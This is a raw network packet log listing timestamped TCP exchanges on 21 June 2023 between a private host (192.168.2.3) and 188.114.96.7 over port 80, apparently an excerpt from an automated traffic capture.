Jun 21, 2023 04:27:45.459301949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459328890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459353924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459357023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459381104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459403038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459405899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459429979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459454060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459477901 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459495068 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459781885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459810019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459836006 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459862947 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459872007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459892035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459917068 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.459918022 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459949017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459974051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.459994078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460000992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460028887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460036993 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460056067 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460082054 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460105896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460107088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460131884 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460134029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460159063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460186005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460200071 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460212946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460238934 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460238934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460274935 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460289001 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460305929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460333109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460351944 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460378885 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460378885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460401058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460403919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460428953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460454941 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460468054 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460490942 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460838079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460866928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460887909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460913897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460921049 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460939884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460966110 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.460969925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.460994959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461007118 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461019039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461047888 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461072922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461097956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461111069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461123943 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461142063 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461149931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461177111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461182117 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461204052 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461230040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461244106 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461255074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461267948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461277962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461303949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461327076 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461328030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461354017 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461376905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461380959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461405993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461417913 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461431980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461489916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461766005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461791992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461816072 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461842060 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461867094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461870909 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461894035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461899042 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461921930 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461950064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461965084 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.461972952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.461988926 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462001085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462028027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462039948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462053061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462080002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462105036 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462116957 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462127924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462141991 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462152958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462177038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462203979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462217093 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462229967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462255001 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462265015 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462280989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462301016 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462306023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462332010 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462346077 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462356091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462670088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462697029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462723017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462723970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462749004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462753057 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462775946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462801933 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462819099 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462829113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462841988 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462853909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462878942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462903976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462923050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462932110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462944984 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.462959051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.462984085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463005066 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.463009119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463032007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463057041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463069916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.463083029 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463103056 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.463108063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463135958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463161945 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463175058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.463186979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463196993 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.463210106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.463643074 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.493813992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.493846893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.493947029 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494380951 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494409084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494432926 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494460106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494484901 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494483948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494503975 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494524002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494530916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494548082 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494553089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494568110 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494592905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494617939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494625092 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494642019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494647980 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494664907 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494694948 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494700909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494724989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494750023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494772911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494788885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494788885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494796038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494820118 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494846106 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494863033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494868040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494882107 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494890928 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494915009 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494935989 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.494946957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494971037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.494993925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495018005 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495022058 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495043039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495049000 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495066881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495089054 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495110989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495126963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495132923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495155096 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495162964 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495177031 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495183945 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495199919 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495223045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495242119 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495246887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495270014 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495271921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495297909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495321035 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495337963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495345116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495362997 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495368958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495393038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495415926 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495439053 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495439053 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495460033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495462894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495488882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495513916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495537043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495537043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495558023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495559931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495584965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495604992 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495620012 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495661020 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.495915890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.495992899 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496016979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496041059 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496041059 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496074915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496098042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496121883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496121883 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496146917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496150017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496174097 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496196985 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496220112 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496226072 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496246099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496253014 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496282101 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496304989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496325970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496331930 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496350050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496352911 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496376038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496397972 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496402025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496424913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496448994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496464014 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496473074 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496484041 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496495962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496517897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496541023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496562958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496562958 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496582031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496583939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496674061 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496803999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496828079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496887922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496912003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496923923 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496934891 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496957064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496965885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.496980906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.496999025 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497006893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497031927 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497056007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497077942 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497080088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497104883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497132063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497142076 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497155905 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497165918 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497180939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497205973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497216940 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497230053 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497253895 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497277021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497278929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497298956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497302055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497328043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497353077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497366905 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497378111 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497401953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497425079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497428894 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497447968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497454882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497471094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497493982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497807980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497843027 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497870922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497895956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497900963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497930050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497932911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497962952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.497982979 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.497992039 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498022079 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498051882 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498053074 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498081923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498090982 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:45.498111963 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498142958 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:45.498152971 CEST	49709	80	192.168.2.3	188.114.96.7
